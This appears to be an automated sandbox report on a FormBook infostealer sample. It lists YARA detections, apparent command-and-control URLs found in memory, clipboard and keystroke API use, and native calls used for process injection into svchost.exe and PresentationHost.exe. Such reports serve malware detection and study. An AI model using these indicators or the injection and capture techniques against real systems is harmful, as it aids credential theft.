          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006406000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000005A86000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.0000000016EA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BD
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_ser
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_ne
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_host&
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_cms
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.washio.world&utm_medium=parking&utm_cam
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.washio.world&amp;reg_source=parking_auto
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000672A000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000005DAA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0067425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0067425A
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00674458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00674458
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0067425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0067425A
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00660219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00660219
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0068CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0068CDAC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: This is a third-party compiled AutoIt script.0_2_00603B4C
          Source: nJ8mJTmMf0.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: nJ8mJTmMf0.exe, 00000000.00000000.1651855029.00000000006B5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_26fbddc7-f
          Source: nJ8mJTmMf0.exe, 00000000.00000000.1651855029.00000000006B5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_eaed8490-7
          Source: nJ8mJTmMf0.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_09d7f7ca-c
          Source: nJ8mJTmMf0.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6dae6a55-d
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042B083 NtClose,1_2_0042B083
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,1_2_032735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274340 NtSetContextThread,1_2_03274340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274650 NtSuspendThread,1_2_03274650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AD0 NtReadFile,1_2_03272AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F30 NtCreateSection,1_2_03272F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FE0 NtCreateFile,1_2_03272FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EA0 NtAdjustPrivilegesToken,1_2_03272EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C60 NtCreateKey,1_2_03272C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C70 NtFreeVirtualMemory,1_2_03272C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CA0 NtQueryInformationToken,1_2_03272CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273090 NtSetValueKey,1_2_03273090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D70 NtOpenThread,1_2_03273D70
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F54650 NtSuspendThread,LdrInitializeThunk,6_2_04F54650
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F54340 NtSetContextThread,LdrInitializeThunk,6_2_04F54340
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04F52CA0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04F52C70
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52C60 NtCreateKey,LdrInitializeThunk,6_2_04F52C60
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04F52DF0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52DD0 NtDelayExecution,LdrInitializeThunk,6_2_04F52DD0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04F52D30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04F52D10
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04F52EE0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04F52E80
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52FE0 NtCreateFile,LdrInitializeThunk,6_2_04F52FE0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52FB0 NtResumeThread,LdrInitializeThunk,6_2_04F52FB0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52F30 NtCreateSection,LdrInitializeThunk,6_2_04F52F30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52AF0 NtWriteFile,LdrInitializeThunk,6_2_04F52AF0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52AD0 NtReadFile,LdrInitializeThunk,6_2_04F52AD0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04F52BF0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04F52BE0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04F52BA0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52B60 NtClose,LdrInitializeThunk,6_2_04F52B60
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F535C0 NtCreateMutant,LdrInitializeThunk,6_2_04F535C0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F539B0 NtGetContextThread,LdrInitializeThunk,6_2_04F539B0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52CF0 NtOpenProcess,6_2_04F52CF0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52CC0 NtQueryVirtualMemory,6_2_04F52CC0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52C00 NtQueryInformationProcess,6_2_04F52C00
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52DB0 NtEnumerateKey,6_2_04F52DB0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52D00 NtSetInformationFile,6_2_04F52D00
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52EA0 NtAdjustPrivilegesToken,6_2_04F52EA0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52E30 NtWriteVirtualMemory,6_2_04F52E30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52FA0 NtQuerySection,6_2_04F52FA0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52F90 NtProtectVirtualMemory,6_2_04F52F90
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52F60 NtCreateProcessEx,6_2_04F52F60
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52AB0 NtWaitForSingleObject,6_2_04F52AB0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F52B80 NtQueryInformationFile,6_2_04F52B80
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F53090 NtSetValueKey,6_2_04F53090
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F53010 NtOpenDirectoryObject,6_2_04F53010
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F53D70 NtOpenThread,6_2_04F53D70
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F53D10 NtOpenProcessToken,6_2_04F53D10
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B27BA0 NtCreateFile,6_2_00B27BA0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B27DE0 NtDeleteFile,6_2_00B27DE0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B27D00 NtReadFile,6_2_00B27D00
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B27E70 NtClose,6_2_00B27E70
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B27FC0 NtAllocateVirtualMemory,6_2_00B27FC0
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00664021: CreateFileW,DeviceIoControl,CloseHandle,0_2_00664021
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00658858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00658858
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0066545F
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0060E8000_2_0060E800
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062DBB50_2_0062DBB5
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0060E0600_2_0060E060
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0068804A0_2_0068804A
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006141400_2_00614140
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006224050_2_00622405
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006365220_2_00636522
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006806650_2_00680665
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0063267E0_2_0063267E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006168430_2_00616843
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062283A0_2_0062283A
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006389DF0_2_006389DF
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00618A0E0_2_00618A0E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00680AE20_2_00680AE2
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00636A940_2_00636A94
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0065EB070_2_0065EB07
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00668B130_2_00668B13
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062CD610_2_0062CD61
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006370060_2_00637006
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0061710E0_2_0061710E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006131900_2_00613190
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006012870_2_00601287
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006233C70_2_006233C7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062F4190_2_0062F419
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006216C40_2_006216C4
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006156800_2_00615680
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006158C00_2_006158C0
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006278D30_2_006278D3
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00621BB80_2_00621BB8
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00639D050_2_00639D05
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0060FE400_2_0060FE40
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062BFE60_2_0062BFE6
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00621FD00_2_00621FD0
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_039436200_2_03943620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022001_2_00402200
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A301_2_00402A30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D4931_2_0042D493
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FD431_2_0040FD43
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041662E1_2_0041662E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004166331_2_00416633
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF631_2_0040FF63
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DFE31_2_0040DFE3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FA01_2_00402FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA3521_2_032FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F01_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033003E61_2_033003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E02741_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C02C01_2_032C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032301001_2_03230100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA1181_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C81581_2_032C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F41A21_2_032F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033001AA1_2_033001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F81CC1_2_032F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D20001_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032407701_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032647501_2_03264750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C01_2_0323C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C6E01_2_0325C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032405351_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033005911_2_03300591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E44201_2_032E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F24461_2_032F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EE4F61_2_032EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB401_2_032FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F6BD71_2_032F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA801_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032569621_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A01_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330A9A61_2_0330A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324A8401_2_0324A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032428401_2_03242840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032268B81_2_032268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E8F01_2_0326E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03282F281_2_03282F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260F301_2_03260F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E2F301_2_032E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4F401_2_032B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BEFA01_2_032BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232FC81_2_03232FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEE261_2_032FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240E591_2_03240E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252E901_2_03252E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FCE931_2_032FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEEDB1_2_032FEEDB
